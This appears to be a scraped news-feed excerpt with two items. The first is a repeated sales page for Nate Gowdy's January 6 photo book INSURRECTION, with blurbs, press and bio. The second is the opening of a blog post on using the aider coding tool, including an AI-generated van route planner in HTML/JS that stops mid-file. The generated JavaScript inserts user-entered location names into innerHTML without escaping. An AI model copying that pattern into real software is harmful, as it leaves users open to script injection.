    — Will Michels, co-curator of WAR/PHOTOGRAPHY: Images of Armed Conflict and its Aftermath, The Museum of Fine Arts, Houston“Gowdy’s photos are a searing reminder of the threat our democracy faced on January 6, 2021. His courage in documenting the images of that fateful day in American history have also been key to ensuring that insurrectionists who incited and executed the attack on our nation’s Capitol are held accountable for their actions.”
    — Donald Sherman, Chief Counsel, Citizens for Responsibility and Ethics in Washington“The book looks amazing and is such an incredible document and reminder of a historically significant day. It’s wildly moving seeing it presented the way you have. Very well done.”
    — Griffin Lotz, Rolling Stone

    “Wow, Gowdy’s images from Jan. 6 are powerful. I can see why he sold out the first print run.”
    — Charles Whitaker, Dean of Northwestern’s Medill School of Journalism

    Nate Gowdy's masterful monograph is photojournalism at its finest. As we are asked to reject the evidence of our eyes and memory hole January 6th, INSURRECTIONshatters those fragile lies and shines the light of truth on those harrowing few hours. Haunting and beautiful, this photographic storytelling showcases a craftsman at the peak of his art.”
    Andrew L. Seidel, author of The Founding Myth: Why Christian Nationalism is Un-American and American Crusade: How the Supreme Court Is Weaponizing Religious Freedom, author of the seminal report Christian Nationalism and the January 6, 2021, Insurrection“Gowdy has an eye for identifying essential truths in a sea of noise. Our country will be reckoning with the fallout of January 6 for years to come, be it the injuries and traumas sustained, the criminal records acquired, or the weakening of our democratic institutions. Turn these pages. The best way to prevent this from happening again is to understand who brought this about. Guard against what they stand for, and thwart the ideologies they represent—in your neighbors and your families, and within yourself.”
    — Officer Daniel Hodges, DC Metropolitan Police Department, in his Foreword“The journalists who take risks to bring us the stories like the ones told here in this book would dismiss the notion that they are doing anything but their jobs. Most would be embarrassed to be called “heroes,” but none would ever countenance being called “the enemy of the people.” That’s an autocrat’s phrase, one usually wielded by politicians and power brokers for whom the real enemy is the truth—which is what journalism, and especially photojournalism, is, at its best. And INSURRECTION is photojournalism at its very best.
    — Michael Rowe, award-winning novelist, in his Introduction

    “For what it’s worth, I’m staying with my mom right now, who cut her teeth protesting the Vietnam War. When she leered through this book, and these images, she immediately said, ‘This is like the photos the journalists sent home from Vietnam.’ This book is a damn important work of art.”
    — Reader review“The book is amazing—well-conceived and laid out with dramatic, evocative photos and ‘in the moment’ text blocks. The timestamps are genius, and, together with the photos, give the book a propulsive feel that keeps the reader engaged, flipping the pages, one after another. It deserves a higher profile, and I honestly feel it should be sent to every member of Congress.”— Reader review“I follow the news, on both sides, and have never had a better understanding of what actually happened that day, and who all was involved, than after seeing this book. And as a photographer, I’m inspired to up my game to capture so much story in singular moments in time. Absolutely stunning!”
    — Reader review“Hi Nate, we were visiting a family friend of yours last night and saw your photo journal of January 6th. As hard as it was to view, here I am in the middle of the night attempting to purchase the book. Huge congrats on the softcover first-edition being sold out. I hear you may have a hardcover version coming out, which means maybe we can still get a copy? Please let me know. It’s something I want my grandchildren to see, study, and know.”
    — Reader review

    PRESS

    March 2023 | Town Hall Seattle
    “Nate Gowdy — The Insurrection in photos”

    January 2023 | PetaPixel
    “Photojournalist releases intense images from the Jan 6 riot”

    January 2023 | Seize the Moment Podcast
    “Nate Gowdy — Storm of the Capitol: The Insurrection of January 6th”

    January 2023 | Seattle Gay News
    “Nate Gowdy captures history in the making in his new book, INSURRECTION”

    January 2023 | Forthright Radio
    “Nate Gowdy’s INSURRECTION

    January 2023 | Nicole Sandler Show
    “No Insurrection whitewashing allowed here with Nate Gowdy”

    January 2023 | PBS NewsHour
    “The 'melee' of Jan. 6, through a photographer's lens”

    January 2023 | Mother Jones
    INSURRECTION: January 6, up close and firsthand: A new photo book brings you face-to-face with the fight for the Capitol”

    January 2023 | Crosscut
    “A Seattle photographer's firsthand account of the Jan. 6 chaos”

    September 2022 | Post Alley | Seattle (originally for PublicDisplay.Art)
    “From Bernie Sanders to immigrant superheroes to January 6th, Seattle photographer Nate Gowdy chronicles the intimate and the dangerous of American Politics”

    January 2023 | Talk Louisiana
    “Photojournalist Nate Gowdy reflects on the January 6 insurrection on its two-year anniversary”

    January 2023 | Thom Hartmann Program
    “‘Jan 6th insurrectionists attacked me during coup attempt’”

    January 2023 | Charlotte Talks with Mike Collins
    “Reflections on the January 6th Capitol attack, two years later”

    December 2022 | Surreal News
    “Interview with photographer Nate Gowdy”

    July 2022 | KBCS.FM
    INSURRECTION: A photo compilation from Jan 6, 2021”

    January 2021 | KING5
    “Seattle-based photographer Nate Gowdy recalls violent day at US Capitol”

    January 2021 | Malcontent News
    “Photographer Nate Gowdy reflects on Washington D.C. Insurrection”

    January 2021 | KBCS.FM
    “Behind the Lens at the nation's Capitol during an Insurrection”

    On January 20, 2017, photojournalist Nate Gowdy stood at the U.S. Capitol, incredulous, as Donald J. Trump—with right hand raised and left atop the Lincoln Bible—took the presidential oath of office, vowing to end “American carnage.”

    Four years later, on January 6, 2021, Gowdy returned to Washington, DC, prepared to document one last MAGA rally: the outgoing president’s “Save America” speech at the Ellipse. Instead, he found himself amidst right-wing extremists, fervently inscribing that day into the annals of history.

    The result is Gowdy’s debut monograph, INSURRECTION, where surreal scenes unfold: militants marching, kneeling in prayer, posing for group photos, breaking for hotdogs, rampaging against the Capitol’s sworn protectors, and leading thousands to defile the Inauguration Day stage.

    Twice assaulted for being deemed “fake news,” Gowdy persisted in exposing the truth. Shot on assignment for Rolling Stone, his stark, unflinching images depict the US Capitol, one of democracy’s most sacred symbols, as it becomes a haunting set piece in a dystopian tableau of domestic terror—an inside job.

    This 150-page hardcover stands as the sole book of photojournalism dedicated to one of the darkest days in modern American history. Its timestamped photographs and contextual captions chronicle one of democracy’s most rarified spaces, once reserved for solemn and dignified assembly, as it is overwhelmed with—you guessed it—American carnage.

    Foreworded by DC Metropolitan Police Officer Daniel Hodges, who risked his life defending the Capitol and was almost crushed to death, INSURRECTION captures a chilling chapter in American politics, spotlighting the fragility of a nation’s ideals.

    INSURRECTION
    Photographs, text & design by Nate Gowdy
    Foreword by Officer Daniel Hodges
    Introduction by Michael Rowe
    Edited by Lisa van Dam-Bates
    Printed and bound in the USA

    • 124 duotone plates
    • 150 pages
    • 9x11 Hardcover
    • Published by Pigeon Editions, January 2023
    • ISBN-13: 978-1-7354812-3-4
    • Print run of 500

    Available here and at select Seattle bookstores, such as Elliott Bay Book Company.
    Shipping on this site is USA only (contact nate.gowdy@gmail.com for exceptions).

    You will receive an email notification when yours ships the next business day!

    ABOUT THE AUTHOR

    Nate Gowdy (1984; Elkhart, Indiana) is a Seattle photographer of 14 years who documents this American political era.

    In 2011, Gowdy was hired as staff photographer at Seattle Gay News, where he became immersed in the city’s queer and trans communities, primarily capturing drag and nightlife culture. He served as the official photographer for the Seattle Pride Parade from 2011 through 2024. In 2012, Gowdy dedicated himself to covering the fight for marriage equality in Washington state.

    Gowdy worked closely with President Obama in 2013 and Vice President Biden in 2014 during their visits to Seattle. Since 2015, he has self-funded coverage of hundreds of political rallies and demonstrations across 27 states and Washington, DC. In 2016, his portrait of Bernie Sanders was featured on TIME magazine’s cover, and editorial clients include Rolling Stone and Mother Jones.

    In 2019, Gowdy, with a small core team, spearheaded The American Superhero project, a collaborative studio portrait and storytelling series. The following year, he photographed and co-authored Our Students, Their Stories for Seattle Public Schools. This 100-page coffee table book celebrates LGBTQIA+ students, families, and staff, marking the first project of its kind commissioned by an American school district.

    In 2023, Gowdy self-published his first monograph, INSURRECTION. This award-winning, 150-page hardcover is the sole book to visually chronicle—with timestamped images and contextual captions—the deadly mob attack on the U.S. Capitol on January 6, 2021. With over 1,250 copies sold, the hardcover remains available at www.nategowdy.com and Elliott Bay Book Co.

    A journalism graduate from Indiana University and a former newspaper editor, preschool caregiver, and community outreach worker, Gowdy maintains a photography studio in Seattle’s International District. His fine art is represented at Monroe Gallery of Photography in Santa Fe, New Mexico. Outside of work, he enjoys teaching, kayaking, biking, yoga, and spending time with loved ones.

    AWARDS & HONORS

    • PX3—The Prix de la Photographie Paris (2023: 1st Place, Book Photographer of the Year; Gold in Book, Documentary; Gold in Press/Political)
    American Photography (Selected: 2023 [x4], 2022 [x2])
    Communication Arts Photography Annual (Books, 2022; Editorial, 2021)
    • International Photography Awards (2022: 1st Place in Book, Self Published; 3rd Place in Editorial/Press, War/Conflict; Best of Show [Guest Curator, Dr. Mark Sealy])
    • Lucie Photo Book Prize (2022: Independent Category Finalist)
    • Society of Professional Journalists Western Washington’s 2022 Passion Project Grant
    • Philipson Foundation’s 2022 Public Documentation Grant

    WHAT PEOPLE ARE SAYING

    “Gowdy's pictures show how close we came to losing our democracy. His book reminds us that we cannot and must not look away and that the threats against our fragile republic are as present as ever. I encourage everyone to page through this courageous work with eyes wide open to the violence, hatred, and lies that have swept up our politics.”
    — Congresswoman Pramila Jayapal (D-WA)

    INSURRECTION moves readers through the day in timestamped, chronological order, bringing them a firsthand, up-close account of not just the insurrection, but what it was like to be a journalist on the front lines of a battle for democracy.”
    — Mother JonesFirst, I want to thank you for photographing what you do. Kudos. I think you are a first-rate journalist. As soon as the insurrection occurred, I started looking at images I felt portrayed the event the best—yours always came out on top.
    — Will Michels, co-curator of WAR/PHOTOGRAPHY: Images of Armed Conflict and its Aftermath, The Museum of Fine Arts, Houston“Gowdy’s photos are a searing reminder of the threat our democracy faced on January 6, 2021. His courage in documenting the images of that fateful day in American history have also been key to ensuring that insurrectionists who incited and executed the attack on our nation’s Capitol are held accountable for their actions.”
    — Donald Sherman, Chief Counsel, Citizens for Responsibility and Ethics in Washington“The book looks amazing and is such an incredible document and reminder of a historically significant day. It’s wildly moving seeing it presented the way you have. Very well done.”
    — Griffin Lotz, Rolling Stone

    “Wow, Gowdy’s images from Jan. 6 are powerful. I can see why he sold out the first print run.”
    — Charles Whitaker, Dean of Northwestern’s Medill School of Journalism

    Nate Gowdy's masterful monograph is photojournalism at its finest. As we are asked to reject the evidence of our eyes and memory hole January 6th, INSURRECTIONshatters those fragile lies and shines the light of truth on those harrowing few hours. Haunting and beautiful, this photographic storytelling showcases a craftsman at the peak of his art.”
    Andrew L. Seidel, author of The Founding Myth: Why Christian Nationalism is Un-American and American Crusade: How the Supreme Court Is Weaponizing Religious Freedom, author of the seminal report Christian Nationalism and the January 6, 2021, Insurrection“Gowdy has an eye for identifying essential truths in a sea of noise. Our country will be reckoning with the fallout of January 6 for years to come, be it the injuries and traumas sustained, the criminal records acquired, or the weakening of our democratic institutions. Turn these pages. The best way to prevent this from happening again is to understand who brought this about. Guard against what they stand for, and thwart the ideologies they represent—in your neighbors and your families, and within yourself.”
    — Officer Daniel Hodges, DC Metropolitan Police Department, in his Foreword“The journalists who take risks to bring us the stories like the ones told here in this book would dismiss the notion that they are doing anything but their jobs. Most would be embarrassed to be called “heroes,” but none would ever countenance being called “the enemy of the people.” That’s an autocrat’s phrase, one usually wielded by politicians and power brokers for whom the real enemy is the truth—which is what journalism, and especially photojournalism, is, at its best. And INSURRECTION is photojournalism at its very best.
    — Michael Rowe, award-winning novelist, in his Introduction

    “For what it’s worth, I’m staying with my mom right now, who cut her teeth protesting the Vietnam War. When she leered through this book, and these images, she immediately said, ‘This is like the photos the journalists sent home from Vietnam.’ This book is a damn important work of art.”
    — Reader review“The book is amazing—well-conceived and laid out with dramatic, evocative photos and ‘in the moment’ text blocks. The timestamps are genius, and, together with the photos, give the book a propulsive feel that keeps the reader engaged, flipping the pages, one after another. It deserves a higher profile, and I honestly feel it should be sent to every member of Congress.”— Reader review“I follow the news, on both sides, and have never had a better understanding of what actually happened that day, and who all was involved, than after seeing this book. And as a photographer, I’m inspired to up my game to capture so much story in singular moments in time. Absolutely stunning!”
    — Reader review“Hi Nate, we were visiting a family friend of yours last night and saw your photo journal of January 6th. As hard as it was to view, here I am in the middle of the night attempting to purchase the book. Huge congrats on the softcover first-edition being sold out. I hear you may have a hardcover version coming out, which means maybe we can still get a copy? Please let me know. It’s something I want my grandchildren to see, study, and know.”
    — Reader review

    PRESS

    March 2023 | Town Hall Seattle
    “Nate Gowdy — The Insurrection in photos”

    January 2023 | PetaPixel
    “Photojournalist releases intense images from the Jan 6 riot”

    January 2023 | Seize the Moment Podcast
    “Nate Gowdy — Storm of the Capitol: The Insurrection of January 6th”

    January 2023 | Seattle Gay News
    “Nate Gowdy captures history in the making in his new book, INSURRECTION”

    January 2023 | Forthright Radio
    “Nate Gowdy’s INSURRECTION

    January 2023 | Nicole Sandler Show
    “No Insurrection whitewashing allowed here with Nate Gowdy”

    January 2023 | PBS NewsHour
    “The 'melee' of Jan. 6, through a photographer's lens”

    January 2023 | Mother Jones
    INSURRECTION: January 6, up close and firsthand: A new photo book brings you face-to-face with the fight for the Capitol”

    January 2023 | Crosscut
    “A Seattle photographer's firsthand account of the Jan. 6 chaos”

    September 2022 | Post Alley | Seattle (originally for PublicDisplay.Art)
    “From Bernie Sanders to immigrant superheroes to January 6th, Seattle photographer Nate Gowdy chronicles the intimate and the dangerous of American Politics”

    January 2023 | Talk Louisiana
    “Photojournalist Nate Gowdy reflects on the January 6 insurrection on its two-year anniversary”

    January 2023 | Thom Hartmann Program
    “‘Jan 6th insurrectionists attacked me during coup attempt’”

    January 2023 | Charlotte Talks with Mike Collins
    “Reflections on the January 6th Capitol attack, two years later”

    December 2022 | Surreal News
    “Interview with photographer Nate Gowdy”

    July 2022 | KBCS.FM
    INSURRECTION: A photo compilation from Jan 6, 2021”

    January 2021 | KING5
    “Seattle-based photographer Nate Gowdy recalls violent day at US Capitol”

    January 2021 | Malcontent News
    “Photographer Nate Gowdy reflects on Washington D.C. Insurrection”

    January 2021 | KBCS.FM
    “Behind the Lens at the nation's Capitol during an Insurrection”

    On January 20, 2017, photojournalist Nate Gowdy stood at the U.S. Capitol, incredulous, as Donald J. Trump—with right hand raised and left atop the Lincoln Bible—took the presidential oath of office, vowing to end “American carnage.”

    Four years later, on January 6, 2021, Gowdy returned to Washington, DC, prepared to document one last MAGA rally: the outgoing president’s “Save America” speech at the Ellipse. Instead, he found himself amidst right-wing extremists, fervently inscribing that day into the annals of history.

    The result is Gowdy’s debut monograph, INSURRECTION, where surreal scenes unfold: militants marching, kneeling in prayer, posing for group photos, breaking for hotdogs, rampaging against the Capitol’s sworn protectors, and leading thousands to defile the Inauguration Day stage.

    Twice assaulted for being deemed “fake news,” Gowdy persisted in exposing the truth. Shot on assignment for Rolling Stone, his stark, unflinching images depict the US Capitol, one of democracy’s most sacred symbols, as it becomes a haunting set piece in a dystopian tableau of domestic terror—an inside job.

    This 150-page hardcover stands as the sole book of photojournalism dedicated to one of the darkest days in modern American history. Its timestamped photographs and contextual captions chronicle one of democracy’s most rarified spaces, once reserved for solemn and dignified assembly, as it is overwhelmed with—you guessed it—American carnage.

    Foreworded by DC Metropolitan Police Officer Daniel Hodges, who risked his life defending the Capitol and was almost crushed to death, INSURRECTION captures a chilling chapter in American politics, spotlighting the fragility of a nation’s ideals.

    INSURRECTION
    Photographs, text & design by Nate Gowdy
    Foreword by Officer Daniel Hodges
    Introduction by Michael Rowe
    Edited by Lisa van Dam-Bates
    Printed and bound in the USA

    • 124 duotone plates
    • 150 pages
    • 9x11 Hardcover
    • Published by Pigeon Editions, January 2023
    • ISBN-13: 978-1-7354812-3-4
    • Print run of 500

    Available here and at select Seattle bookstores, such as Elliott Bay Book Company.
    Shipping on this site is USA only (contact nate.gowdy@gmail.com for exceptions).

    You will receive an email notification when yours ships the next business day!

    ABOUT THE AUTHOR

    Nate Gowdy (1984; Elkhart, Indiana) is a Seattle photographer of 14 years who documents this American political era.

    In 2011, Gowdy was hired as staff photographer at Seattle Gay News, where he became immersed in the city’s queer and trans communities, primarily capturing drag and nightlife culture. He served as the official photographer for the Seattle Pride Parade from 2011 through 2024. In 2012, Gowdy dedicated himself to covering the fight for marriage equality in Washington state.

    Gowdy worked closely with President Obama in 2013 and Vice President Biden in 2014 during their visits to Seattle. Since 2015, he has self-funded coverage of hundreds of political rallies and demonstrations across 27 states and Washington, DC. In 2016, his portrait of Bernie Sanders was featured on TIME magazine’s cover, and editorial clients include Rolling Stone and Mother Jones.

    In 2019, Gowdy, with a small core team, spearheaded The American Superhero project, a collaborative studio portrait and storytelling series. The following year, he photographed and co-authored Our Students, Their Stories for Seattle Public Schools. This 100-page coffee table book celebrates LGBTQIA+ students, families, and staff, marking the first project of its kind commissioned by an American school district.

    In 2023, Gowdy self-published his first monograph, INSURRECTION. This award-winning, 150-page hardcover is the sole book to visually chronicle—with timestamped images and contextual captions—the deadly mob attack on the U.S. Capitol on January 6, 2021. With over 1,250 copies sold, the hardcover remains available at www.nategowdy.com and Elliott Bay Book Co.

    A journalism graduate from Indiana University and a former newspaper editor, preschool caregiver, and community outreach worker, Gowdy maintains a photography studio in Seattle’s International District. His fine art is represented at Monroe Gallery of Photography in Santa Fe, New Mexico. Outside of work, he enjoys teaching, kayaking, biking, yoga, and spending time with loved ones.

    AWARDS & HONORS

    • PX3—The Prix de la Photographie Paris (2023: 1st Place, Book Photographer of the Year; Gold in Book, Documentary; Gold in Press/Political)
    American Photography (Selected: 2023 [x4], 2022 [x2])
    Communication Arts Photography Annual (Books, 2022; Editorial, 2021)
    • International Photography Awards (2022: 1st Place in Book, Self Published; 3rd Place in Editorial/Press, War/Conflict; Best of Show [Guest Curator, Dr. Mark Sealy])
    • Lucie Photo Book Prize (2022: Independent Category Finalist)
    • Society of Professional Journalists Western Washington’s 2022 Passion Project Grant
    • Philipson Foundation’s 2022 Public Documentation Grant

    WHAT PEOPLE ARE SAYING

    “Gowdy's pictures show how close we came to losing our democracy. His book reminds us that we cannot and must not look away and that the threats against our fragile republic are as present as ever. I encourage everyone to page through this courageous work with eyes wide open to the violence, hatred, and lies that have swept up our politics.”
    — Congresswoman Pramila Jayapal (D-WA)

    INSURRECTION moves readers through the day in timestamped, chronological order, bringing them a firsthand, up-close account of not just the insurrection, but what it was like to be a journalist on the front lines of a battle for democracy.”
    — Mother JonesFirst, I want to thank you for photographing what you do. Kudos. I think you are a first-rate journalist. As soon as the insurrection occurred, I started looking at images I felt portrayed the event the best—yours always came out on top.
    — Will Michels, co-curator of WAR/PHOTOGRAPHY: Images of Armed Conflict and its Aftermath, The Museum of Fine Arts, Houston“Gowdy’s photos are a searing reminder of the threat our democracy faced on January 6, 2021. His courage in documenting the images of that fateful day in American history have also been key to ensuring that insurrectionists who incited and executed the attack on our nation’s Capitol are held accountable for their actions.”
    — Donald Sherman, Chief Counsel, Citizens for Responsibility and Ethics in Washington“The book looks amazing and is such an incredible document and reminder of a historically significant day. It’s wildly moving seeing it presented the way you have. Very well done.”
    — Griffin Lotz, Rolling Stone

    “Wow, Gowdy’s images from Jan. 6 are powerful. I can see why he sold out the first print run.”
    — Charles Whitaker, Dean of Northwestern’s Medill School of Journalism

    Nate Gowdy's masterful monograph is photojournalism at its finest. As we are asked to reject the evidence of our eyes and memory hole January 6th, INSURRECTIONshatters those fragile lies and shines the light of truth on those harrowing few hours. Haunting and beautiful, this photographic storytelling showcases a craftsman at the peak of his art.”
    Andrew L. Seidel, author of The Founding Myth: Why Christian Nationalism is Un-American and American Crusade: How the Supreme Court Is Weaponizing Religious Freedom, author of the seminal report Christian Nationalism and the January 6, 2021, Insurrection“Gowdy has an eye for identifying essential truths in a sea of noise. Our country will be reckoning with the fallout of January 6 for years to come, be it the injuries and traumas sustained, the criminal records acquired, or the weakening of our democratic institutions. Turn these pages. The best way to prevent this from happening again is to understand who brought this about. Guard against what they stand for, and thwart the ideologies they represent—in your neighbors and your families, and within yourself.”
    — Officer Daniel Hodges, DC Metropolitan Police Department, in his Foreword“The journalists who take risks to bring us the stories like the ones told here in this book would dismiss the notion that they are doing anything but their jobs. Most would be embarrassed to be called “heroes,” but none would ever countenance being called “the enemy of the people.” That’s an autocrat’s phrase, one usually wielded by politicians and power brokers for whom the real enemy is the truth—which is what journalism, and especially photojournalism, is, at its best. And INSURRECTION is photojournalism at its very best.
    — Michael Rowe, award-winning novelist, in his Introduction

    “For what it’s worth, I’m staying with my mom right now, who cut her teeth protesting the Vietnam War. When she leered through this book, and these images, she immediately said, ‘This is like the photos the journalists sent home from Vietnam.’ This book is a damn important work of art.”
    — Reader review“The book is amazing—well-conceived and laid out with dramatic, evocative photos and ‘in the moment’ text blocks. The timestamps are genius, and, together with the photos, give the book a propulsive feel that keeps the reader engaged, flipping the pages, one after another. It deserves a higher profile, and I honestly feel it should be sent to every member of Congress.”— Reader review“I follow the news, on both sides, and have never had a better understanding of what actually happened that day, and who all was involved, than after seeing this book. And as a photographer, I’m inspired to up my game to capture so much story in singular moments in time. Absolutely stunning!”
    — Reader review“Hi Nate, we were visiting a family friend of yours last night and saw your photo journal of January 6th. As hard as it was to view, here I am in the middle of the night attempting to purchase the book. Huge congrats on the softcover first-edition being sold out. I hear you may have a hardcover version coming out, which means maybe we can still get a copy? Please let me know. It’s something I want my grandchildren to see, study, and know.”
    — Reader review

    PRESS

    March 2023 | Town Hall Seattle
    “Nate Gowdy — The Insurrection in photos”

    January 2023 | PetaPixel
    “Photojournalist releases intense images from the Jan 6 riot”

    January 2023 | Seize the Moment Podcast
    “Nate Gowdy — Storm of the Capitol: The Insurrection of January 6th”

    January 2023 | Seattle Gay News
    “Nate Gowdy captures history in the making in his new book, INSURRECTION”

    January 2023 | Forthright Radio
    “Nate Gowdy’s INSURRECTION

    January 2023 | Nicole Sandler Show
    “No Insurrection whitewashing allowed here with Nate Gowdy”

    January 2023 | PBS NewsHour
    “The 'melee' of Jan. 6, through a photographer's lens”

    January 2023 | Mother Jones
    INSURRECTION: January 6, up close and firsthand: A new photo book brings you face-to-face with the fight for the Capitol”

    January 2023 | Crosscut
    “A Seattle photographer's firsthand account of the Jan. 6 chaos”

    September 2022 | Post Alley | Seattle (originally for PublicDisplay.Art)
    “From Bernie Sanders to immigrant superheroes to January 6th, Seattle photographer Nate Gowdy chronicles the intimate and the dangerous of American Politics”

    January 2023 | Talk Louisiana
    “Photojournalist Nate Gowdy reflects on the January 6 insurrection on its two-year anniversary”

    January 2023 | Thom Hartmann Program
    “‘Jan 6th insurrectionists attacked me during coup attempt’”

    January 2023 | Charlotte Talks with Mike Collins
    “Reflections on the January 6th Capitol attack, two years later”

    December 2022 | Surreal News
    “Interview with photographer Nate Gowdy”

    July 2022 | KBCS.FM
    INSURRECTION: A photo compilation from Jan 6, 2021”

    January 2021 | KING5
    “Seattle-based photographer Nate Gowdy recalls violent day at US Capitol”

    January 2021 | Malcontent News
    “Photographer Nate Gowdy reflects on Washington D.C. Insurrection”

    January 2021 | KBCS.FM
    “Behind the Lens at the nation's Capitol during an Insurrection”

    ]]>
    http://www.nategowdy.com/insurrection-book-orders/p/9x11-hardcover-edition hacker-news-small-sites-43195254 Thu, 27 Feb 2025 15:30:57 GMT
    <![CDATA[Vibe Coding with Aider: Tips and Tricks]]> thread link) | @bitforger
    February 27, 2025 | http://mitchgordon.me/tools/2025/02/26/aider.html | archive.org

    I started using aider last month as a way to get back in shape after a long leave from work. Eventually aider sped me up a lot, but I had to learn some new ways of approaching development. It was different from using cursor in that you don’t really see the code until it’s being edited. This doc is a compilation of the notes I took as I worked on a few projects, which I think will be helpful to others using aider for the first time.

    Note: if you have seen Claude Code, aider has a very similar UX.

    First, turn on architect mode with /archtiect. This splits the model’s response into two phases: proposing changes and actually editing files. This improves model performance by giving it a chance to plan while also giving you a chance to reject proposed changes and ask for revisions before touching any files.

    /architect
    
    
        > Aider v0.71.2.dev+less  
        > Main model: claude-3-5-sonnet-20241022 with architect edit format, infinite output  
        > Editor model: claude-3-5-sonnet-20241022 with editor-diff edit format  
        > Weak model: claude-3-5-haiku-20241022  
        > Git repo: .git with 13 files  
        > Repo-map: using 4096 tokens, auto refresh  
        > Added beat_sheet.py to the chat.  
        > Added chapters.py to the chat.  
        > Added characters.py to the chat.  
        > Added lm.py to the chat.  
        > Added location.py to the chat.  
        > Added main.py to the chat.  
        > Added pick.py to the chat.  
        > Added write.py to the chat.  
        ```
    
    


    Add the files you want to work on with /add. If you don’t know which, ask to list files that need editing, or just add them all if there’s not many. Drop fluff with /drop , which improves performance. If you’re new to the codebase and don’t want to make changes, /ask about the codebase.

    /ask we're breaking back into this project after almost a year. open the files you need to open and get me back up to speed on what's going on.
    
        From the file summaries, this appears to be a writing assistance tool, likely for romance novels. Let me break down what I can see:
        
        1. The core structure seems to be built around an `AppState` class in `main.py` that manages different states like:
           - MAIN_MENU
           - BEATS (for beat sheets/story structure)
           - CHAPTER
           - CHAPTER_SKETCH
           and others
        
        2. The project has several main components:
           - Beat sheets (story structure) management (`beat_sheet.py`)
           - Chapter and section handling (`chapters.py`)
           - Character management (`characters.py`)
           - Location management (`location.py`)
           - Language model integration (`lm.py`) - seems to use GPT-4 for assistance
           - Writing interface (`write.py`)
        
        3. It appears to be an interactive tool that helps authors:
           - Plan their story structure
           - Manage chapters and sections
           - Work with characters
           - Handle locations
           - Get AI assistance for various aspects of writing
        
        To give you a more detailed analysis of how it all works together, I'd need to see the full contents of at least:
        1. `main.py` - to understand the state management and overall flow
        2. One of the handler files (like `chapters.py` or `beat_sheet.py`) - to see how the interaction works
        
        Would you like me to look at any of those in detail?
        
    
    /add characters.py
    
        > Added characters.py to the chat  
        

    Get something running as soon as possible (UI or tests). Turn on watch files for your framework (ask how to do this if you don’t know). Then, ask for features or fixes (add a button, change the title, etc.). After every change, test if things work or if anything related broke.

    ok let's go ahead with the simplest MVP, starting with the data input UI.
    
    I'll propose a simple HTML/CSS/JS structure for the data input UI, starting with just vans and locations.
    
    Create this basic file structure:
    ```
    index.html
    styles.css
    app.js
    ```
    
    For index.html, start with:
    ```html
    <!DOCTYPE html>
    <html>
    <head>
        <title>Van Route Planner</title>
        <link rel="stylesheet" href="styles.css">
    </head>
    <body>
        <div class="container">
            <h1>Van Route Planner</h1>
            
            <section id="van-section">
                <h2>Vans</h2>
                <div id="van-list"></div>
                <button onclick="addVan()">Add Van</button>
            </section>
    
            <section id="location-section">
                <h2>Destinations</h2>
                <div id="location-list"></div>
                <button onclick="addLocation()">Add Location</button>
            </section>
    
            <button id="calculate" onclick="calculateRoutes()" disabled>Calculate Routes</button>
        </div>
        <script src="app.js"></script>
    </body>
    </html>
    ```
    
    For app.js, start with:
    ```javascript
    let vans = [];
    let locations = [];
    
    function addVan() {
        const van = {
            id: Date.now().toString(),
            seatCount: 6
        };
        vans.push(van);
        renderVans();
        updateCalculateButton();
    }
    
    function addLocation() {
        const location = {
            id: Date.now().toString(),
            name: '',
            passengerCount: 1
        };
        locations.push(location);
        renderLocations();
        updateCalculateButton();
    }
    
    function renderVans() {
        const vanList = document.getElementById('van-list');
        vanList.innerHTML = vans.map(van => `
            <div class="van-item">
                <label>Seats:
                    <select onchange="updateVanSeats('${van.id}', this.value)">
                        <option value="6" ${van.seatCount === 6 ? 'selected' : ''}>6</option>
                        <option value="7" ${van.seatCount === 7 ? 'selected' : ''}>7</option>
                    </select>
                </label>
                <button onclick="deleteVan('${van.id}')">Delete</button>
            </div>
        `).join('');
    }
    
    function renderLocations() {
        const locationList = document.getElementById('location-list');
        locationList.innerHTML = locations.map(location => `
            <div class="location-item">
                <input type="text" 
                       placeholder="Location name" 
                       value="${location.name}"
                       onchange="updateLocationName('${location.id}', this.value)">
                <input type="number" 
                       min="1" 
                       max="5" 
                       value="${location.passengerCount}"
                       onchange="updatePassengerCount('${location.id}', this.value)">
                <button onclick="deleteLocation('${location.id}')">Delete</button>
            </div>
        `).join('');
    }
    
    function updateVanSeats(id, seats) {
        const van = vans.find(v => v.id === id);
        if (van) van.seatCount = parseInt(seats);
    }
    
    function updateLocationName(id, name) {
        const location = locations.find(l => l.id === id);
        if (location) location.name = name;
    }
    
    function updatePassengerCount(id, count) {
        const location = locations.find(l => l.id === id);
        if (location) location.passengerCount = parseInt(count);
    }
    
    function deleteVan(id) {
        vans = vans.filter(v => v.id !== id);
        renderVans();
        updateCalculateButton();
    }
    
    function deleteLocation(id) {
        locations = locations.filter(l => l.id !== id);
        renderLocations();
        updateCalculateButton();
    }
    
    function updateCalculateButton() {
        const button = document.getElementById('calculate');
        button.disabled = vans.length === 0 || locations.length === 0;
    }
    
    function calculateRoutes() {
        // This will be implemented next
        console.log('Calculating routes for:', {vans, locations});
    }
    ```
    
    For styles.css, start with:
    ```css
    .container {
        max-width: 800px;
        margin: 0 auto;
        padding: 20px;
    }
    
    section {
        margin-bottom: 20px;
    }
    
    .van-item, .location-item {
        margin: 10px 0;
        padding: 10px;
        border: 1px solid #ccc;
        border-radius: 4px;
    }
    
    button {
        margin: 5px;
        padding: 5px 10px;
    }
    
    input, select {
        margin: 0 5px;
        padding: 3px;
    }
    
    #calculate {
        display: block;
        margin-top: 20px;
        padding: 10px 20px;
    }
    ```
    
    This gives you:
    1. Ability to add/remove vans and set their seat count (6 or 7)
    2. Ability to add/remove locations and set passenger counts (1-5)
    3. Basic validation (Calculate button enabled only when there's at least one van and location)
    4. Data stored in memory (we'll add localStorage persistence next)
    
    Would you like me to:
    1. Add localStorage persistence
    2. Start on the route calculation logic
    3. Enhance the UI with additional features
    4. Something else?
    
    > Tokens: 1.0k sent, 1.1k received. Cost: $0.02 message, $0.03 session.  
    > Edit the files? (Y)es/(N)o [Yes]: y  
    
    Let me create these initial files using *SEARCH/REPLACE blocks*:
    
    index.html
    ```html
    <<<<<<< SEARCH
    =======
    <!DOCTYPE html>
    <html>
    <head>
        <title>Van Route Planner</title>
        <link rel="stylesheet" href="styles.css">
    </head>
    <body>
        <div class="container">
            <h1>Van Route Planner</h1>
            
            <section id="van-section">
                <h2>Vans</h2>
                <div id="van-list"></div>
                <button onclick="addVan()">Add Van</button>
            </section>
    
            <section id="location-section">
                <h2>Destinations</h2>
                <div id="location-list"></div>
                <button onclick="addLocation()">Add Location</button>
            </section>
    
            <button id="calculate" onclick="calculateRoutes()" disabled>Calculate Routes</button>
        </div>
        <script src="app.js"></script>
